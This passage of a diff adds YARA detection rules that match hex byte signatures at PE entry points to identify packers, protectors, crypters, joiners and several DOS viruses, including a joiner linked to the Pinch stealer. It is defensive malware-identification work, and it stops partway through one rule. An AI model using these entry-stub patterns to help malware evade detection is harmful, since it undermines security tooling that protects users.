+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA 1E 17 50 B4 30 CD 21 3C 02 73 ?? B4 4C CD 21 FC BE ?? ?? BF ?? ?? E8 ?? ?? E8 ?? ?? BB ?? ?? BA ?? ?? 8A C3 8B F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PGMPACKv014
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 17 50 B4 30 CD 21 3C 02 73 ?? B4 4C CD 21 FC BE ?? ?? BF ?? ?? E8 ?? ?? E8 ?? ?? BB ?? ?? BA ?? ?? 8A C3 8B F3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner0232Lite003Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 06 FC 1E 07 BE 90 90 90 90 6A 04 68 90 10 90 90 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePEtite22FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 B8 00 00 00 00 68 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MEW10byNorthfox
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule theWRAPbyTronDoc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 48 D2 4B 00 E8 BC 87 F4 FF BB 04 0B 4D 00 33 C0 55 68 E8 D5 4B 00 64 FF 30 64 89 20 E8 9C F4 FF FF E8 F7 FB FF FF 6A 40 8D 55 F0 A1 F0 ED 4B 00 8B 00 E8 42 2E F7 FF 8B 4D F0 B2 01 A1 F4 C2 40 00 E8 F7 20 F5 FF 8B F0 B2 01 A1 B4 C3 40 00 E8 F1 5B F4 FF 89 03 33 D2 8B 03 E8 42 1E F5 FF 66 B9 02 00 BA FC FF FF FF 8B C6 8B 38 FF 57 0C BA B8 A7 4D 00 B9 04 00 00 00 8B C6 8B 38 FF 57 04 83 3D B8 A7 4D 00 00 0F 84 5E 01 00 00 8B 15 B8 A7 4D 00 83 C2 04 F7 DA 66 B9 02 00 8B C6 8B 38 FF 57 0C 8B 0D B8 A7 4D 00 8B D6 8B 03 E8 2B 1F F5 FF 8B C6 E8 B4 5B F4 FF 33 D2 8B 03 E8 DF 1D F5 FF BA F0 44 4E 00 B9 01 00 00 00 8B 03 8B 30 FF 56 04 80 3D F0 44 4E 00 0A 75 3F BA B8 A7 4D 00 B9 04 00 00 00 8B 03 8B 30 FF 56 04 8B 15 B8 A7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petitev211
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petitev212
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 64 ?? ?? ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MaskPEV20yzkzero
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 18 00 00 00 64 8B 18 83 C3 30 C3 40 3E 0F B6 00 C1 E0 ?? 83 C0 ?? 36 01 04 24 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01Morphine12Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 06 00 90 90 90 90 90 90 90 90 EB 08 E8 90 00 00 00 66 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 51 66 90 90 90 59 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EZIPv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 19 32 00 00 E9 7C 2A 00 00 E9 19 24 00 00 E9 FF 23 00 00 E9 1E 2E 00 00 E9 88 2E 00 00 E9 2C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule y0dasCrypterv12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ChinaProtectdummy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C3 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 30 C3 56 8B ?? ?? ?? 6A 40 68 00 10 00 00 8D ?? ?? 50 6A 00 E8 ?? ?? ?? ?? 89 30 83 C0 04 5E C3 8B 44 ?? ?? 56 8D ?? ?? 68 00 40 00 00 FF 36 56 E8 ?? ?? ?? ?? 68 00 80 00 00 6A 00 56 E8 ?? ?? ?? ?? 5E C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule BopCryptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BD ?? ?? ?? ?? E8 ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MinkeV101Codius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 26 3D 4F 38 C2 82 37 B8 F3 24 42 03 17 9B 3A 83 01 00 00 CC 00 00 00 00 06 00 00 00 01 64 53 74 75 62 00 10 55 54 79 70 65 73 00 00 C7 53 79 73 74 65 6D 00 00 81 53 79 73 49 6E 69 74 00 0C 4B 57 69 6E 64 6F 77 73 00 00 8A 75 46 75 6E 63 74 69 6F 6E 73 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02BorlandDelphiDLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 B4 B8 90 90 90 90 E8 00 00 00 00 E8 00 00 00 00 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule bambam004bedrock
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? ?? ?? 83 C9 FF 33 C0 68 ?? ?? ?? ?? F2 AE F7 D1 49 51 68 ?? ?? ?? ?? E8 11 0A 00 00 83 C4 0C 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 BF ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 BF ?? ?? ?? ?? 8B D1 68 ?? ?? ?? ?? C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA BF ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 49 51 68 ?? ?? ?? ?? E8 C0 09 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackFullEdition117DLLLZMAAp0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 EB 09 00 00 89 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev22
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEtitev21
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ElicenseSystemV4000ViaTechInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 63 79 62 00 65 6C 69 63 65 6E 34 30 2E 64 6C 6C 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule VProtectorV10Build20041213testvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1A 89 40 00 68 56 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 E8 03 00 00 00 C7 84 00 58 EB 01 E9 83 C0 07 50 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Themida18xxOreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 }
+	$a1 = { B8 ?? ?? ?? ?? 60 0B C0 74 68 E8 00 00 00 00 58 05 53 00 00 00 80 38 E9 75 13 61 EB 45 DB 2D 37 ?? ?? ?? FF FF FF FF FF FF FF FF 3D 40 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 00 00 83 C3 67 39 1A 74 07 2D 00 10 00 00 EB DA 8B F8 B8 ?? ?? ?? ?? 03 C7 B9 ?? ?? ?? ?? 03 CF EB 0A B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 51 E8 84 00 00 00 E8 00 00 00 00 58 2D 26 00 00 00 B9 EF 01 00 00 C6 00 E9 83 E9 05 89 48 01 61 E9 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule EXEJoinerv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 C6 00 5C 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MicroJoiner11coban2k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 0C 70 40 00 BB F8 11 40 00 33 ED 83 EE 04 39 2E 74 11 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01FSG10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov200b2200b3
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 00 F2 40 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RAZOR1911encruptor
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? BF ?? ?? 3B FC 72 ?? B4 4C CD 21 BE ?? ?? B9 ?? ?? FD F3 A5 FC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElock051tE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 00 00 59 EB 01 EB AC 54 E8 03 00 00 00 5C EB 08 8D 64 24 04 FF 64 24 FC 6A 05 D0 2C 24 72 01 E8 01 24 24 5C F7 DC EB 02 CD 20 8D 64 24 FE F7 DC EB 02 CD 20 FE C8 E8 00 00 00 00 32 C1 EB 02 82 0D AA EB 03 82 0D 58 EB 02 1D 7A 49 EB 05 E8 01 00 00 00 7F AE 14 7E A0 77 76 75 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectorBasicProEdition112RandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 E8 3B 00 00 00 E8 01 00 00 00 FF 58 05 53 00 00 00 51 8B 4C 24 10 89 81 B8 00 00 00 B8 55 01 00 00 89 41 20 33 C0 89 41 04 89 41 08 89 41 0C 89 41 10 59 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 33 C0 64 FF 30 64 89 20 9C 80 4C 24 01 01 9D 90 90 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 C3 64 8F 00 58 74 07 75 05 19 32 67 E8 E8 74 27 75 25 EB 00 EB FC 68 39 44 CD 00 59 9C 50 74 0F 75 0D E8 59 C2 04 00 55 8B EC E9 FA FF FF 0E E8 EF FF FF FF 56 57 53 78 03 79 01 E8 68 A2 AF 47 01 59 E8 01 00 00 00 FF 58 05 7B 03 00 00 03 C8 74 C4 75 C2 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxFaxFreeTopo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FA 06 33 C0 8E C0 B8 ?? ?? 26 ?? ?? ?? ?? 50 8C C8 26 ?? ?? ?? ?? 50 CC 58 9D 58 26 ?? ?? ?? ?? 58 26 ?? ?? ?? ?? 07 FB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02MEW11SE10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Joinersignfrompinch250320072010
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 81 EC 04 01 00 00 8B F4 68 04 01 00 00 56 6A 00 E8 7C 01 00 00 33 C0 6A 00 68 80 00 00 00 6A 03 6A 00 6A 00 68 00 00 00 80 56 E8 50 01 00 00 8B D8 6A 00 6A 00 6A 00 6A 02 6A 00 53 E8 44 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxSK
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { CD 20 B8 03 00 CD 10 51 E8 00 00 5E 83 EE 09 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEStubOEPv1x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 40 48 BE 00 ?? ?? 00 40 48 60 33 C0 B8 ?? ?? ?? 00 FF E0 C3 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule MoleBoxV23XMoleStudiocom
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 E8 4F 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxHymn1865
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 83 EE 4C FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 ?? ?? ?? FB 3B ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? ?? 50 06 56 1E 0E 1F B8 00 C5 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchyRyd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD 08 ?? ?? 00 C7 45 00 ?? ?? ?? 00 FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? 00 57 BE ?? ?? ?? 00 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 10 C9 73 F3 FF 45 0C 91 AA 83 C9 FF 8D 5C 8D 18 FF D6 74 DD E3 17 8D 5D 1C FF D6 74 10 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECryptv100v101
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? ?? ?? 5B 83 EB 05 EB 04 52 4E 44 21 EB 02 CD 20 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CERBERUSv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 2B ED 8C ?? ?? 8C ?? ?? FA E4 ?? 88 ?? ?? 16 07 BF ?? ?? 8E DD 9B F5 B9 ?? ?? FC F3 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptor2117StrongbitSoftCompleteDevelopment
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? B8 00 00 ?? ?? 89 45 FC 89 C2 8B 46 0C 09 C0 0F 84 ?? 00 00 00 01 D0 89 C3 50 FF 15 94 ?? ?? ?? 09 C0 0F 85 0F 00 00 00 53 FF 15 98 ?? ?? ?? 09 C0 0F 84 ?? 00 00 00 89 45 F8 6A 00 8F 45 F4 8B 06 09 C0 8B 55 FC 0F 85 03 00 00 00 8B 46 10 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule WWPACKv303
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? 8C CA 03 D0 8C C9 81 C1 ?? ?? 51 B9 ?? ?? 51 06 06 BB ?? ?? 53 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule GHFProtectorpackonlyGPcH
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 68 00 00 00 00 6A 40 FF D0 89 05 ?? ?? ?? ?? 89 C7 BE ?? ?? ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 61 B9 FC FF FF FF 8B 1C 08 89 99 ?? ?? ?? ?? E2 F5 90 90 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 01 D6 8B 46 0C 85 C0 0F 84 87 00 00 00 01 D0 89 C3 50 B8 ?? ?? ?? ?? FF 10 85 C0 75 08 53 B8 ?? ?? ?? ?? FF 10 89 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00 00 00 00 BA ?? ?? ?? ?? 8B 06 85 C0 75 03 8B 46 10 01 D0 03 05 ?? ?? ?? ?? 8B 18 8B 7E 10 01 D7 03 3D ?? ?? ?? ?? 85 DB 74 2B F7 C3 00 00 00 80 75 04 01 D3 43 43 81 E3 FF FF FF 0F 53 FF 35 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 89 07 83 05 ?? ?? ?? ?? 04 EB AE 83 C6 14 BA ?? ?? ?? ?? E9 6E FF FF FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 8B 15 ?? ?? ?? ?? 52 FF D0 61 BA ?? ?? ?? ?? FF E2 90 C3 }
+	$a1 = { 60 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? FF 10 68 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? FF 10 68 00 00 00 00 6A 40 FF D0 89 05 ?? ?? ?? ?? 89 C7 BE ?? ?? ?? ?? 60 FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule yzpackV11UsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 33 C0 8D 48 07 50 E2 FD 8B EC 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C 8B 40 3C 89 45 04 E8 F3 07 00 00 60 8B 5D 04 8B 73 3C 8B 74 33 78 03 F3 56 8B 76 20 03 F3 33 C9 49 92 41 AD 03 C3 52 33 FF 0F B6 10 38 F2 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxDanishtiny
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXV194MarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }
+
+condition:
+		$a0
+}
+	
+	
+rule yzpack112UsAr
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5A 52 45 60 83 EC 18 8B EC 8B FC 33 C0 64 8B 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 83 C0 7C 8B 40 3C AB E9 ?? ?? ?? ?? B4 09 BA 00 00 1F CD 21 B8 01 4C CD 21 40 00 00 00 50 45 00 00 4C 01 02 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 E0 00 ?? ?? 0B 01 ?? ?? ?? ?? 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02YodasProtector102Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02PESHiELD025Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 2B 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 CC CC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV34V35LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DualseXe10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 08 03 00 00 89 28 33 FF 8D 85 7D 02 00 00 8D 8D 08 03 00 00 2B C8 8B 9D 58 03 00 00 E8 1C 02 00 00 8D 9D 61 02 00 00 8D B5 7C 02 00 00 46 80 3E 00 74 24 56 FF 95 0A 04 00 00 46 80 3E 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NoodleCryptv200EngNoodleSpa
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftComp1xBGSoftPT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 81 2C 24 3A 10 41 00 5D E8 00 00 00 00 81 2C 24 31 01 00 00 8B 85 2A 0F 41 00 29 04 24 8B 04 24 89 85 2A 0F 41 00 58 8B 85 2A 0F 41 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Petite13c1998IanLuck
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 50 8D 88 00 ?? ?? ?? 8D 90 ?? ?? 00 00 8B DC 8B E1 68 00 00 ?? ?? 53 50 80 04 24 08 50 80 04 24 42 50 80 04 24 61 50 80 04 24 9D 50 80 04 24 BB 83 3A 00 0F 84 DA 14 00 00 8B 44 24 18 F6 42 03 80 74 19 FD 80 72 03 80 8B F0 8B F8 03 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PENightMarev13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D B9 ?? ?? ?? ?? 80 31 15 41 81 F9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo50DllSiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 75 05 E8 DE 4B 00 00 FF 74 24 04 8B 4C 24 10 8B 54 24 0C E8 ED FE FF FF 59 C2 0C 00 6A 0C 68 ?? ?? ?? ?? E8 E5 24 00 00 8B 4D 08 33 FF 3B CF 76 2E 6A E0 58 33 D2 F7 F1 3B 45 0C 1B C0 40 75 1F E8 8F 15 00 00 C7 00 0C 00 00 00 57 57 57 57 57 E8 20 15 00 00 83 C4 14 33 C0 E9 D5 00 00 00 0F AF 4D 0C 8B F1 89 75 08 3B F7 75 03 33 F6 46 33 DB 89 5D E4 83 FE E0 77 69 83 3D ?? ?? ?? ?? 03 75 4B 83 C6 0F 83 E6 F0 89 75 0C 8B 45 08 3B 05 ?? ?? ?? ?? 77 37 6A 04 E8 D7 23 00 00 59 89 7D FC FF 75 08 E8 EC 53 00 00 59 89 45 E4 C7 45 FC FE FF FF FF E8 5F 00 00 00 8B 5D E4 3B DF 74 11 FF 75 08 57 53 E8 2B C5 FF FF 83 C4 0C 3B DF 75 61 56 6A 08 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 3B DF 75 4C 39 3D ?? ?? ?? ?? 74 33 56 E8 19 ED FF FF 59 85 C0 0F 85 72 FF FF FF 8B 45 10 3B C7 0F 84 50 FF FF FF C7 00 0C 00 00 00 E9 45 FF FF FF 33 FF 8B 75 0C 6A 04 E8 7D 22 00 00 59 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1350ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
